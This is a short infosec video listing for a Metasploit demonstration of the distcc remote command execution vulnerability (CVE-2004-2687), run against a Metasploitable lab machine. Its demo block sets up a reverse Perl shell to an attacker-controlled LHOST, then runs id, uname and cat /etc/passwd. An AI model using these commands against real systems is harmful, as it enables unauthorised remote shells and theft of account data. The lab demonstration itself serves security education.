Description: Timeline :
Vulnerability discovered by Ray Slakinski & Jason McLeod
Public release of the vulnerability the 2005-03-10
Metasploit PoC provided the 2006-01-20 (not sure)
PoC provided by hdm
Reference(s) :
CVE-2004-2687
OSVDB-13378
Affected versions :
DistCC 1.x
DistCC below version or equal to 2.18.3
Tested on Metasploitable with DistCC 2.18.3-4.1ubuntu1
Description :
This module uses a documented security weakness to execute arbitrary commands on any system running distccd.
Metasploit demo :
use exploit/unix/misc/distcc_exec
set RHOST 192.168.178.45
set PAYLOAD cmd/unix/reverse_perl
set LHOST 192.168.178.21
exploit
id
uname -a
cat /etc/passwd
Tags: Distcc , Metasploit ,
Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying.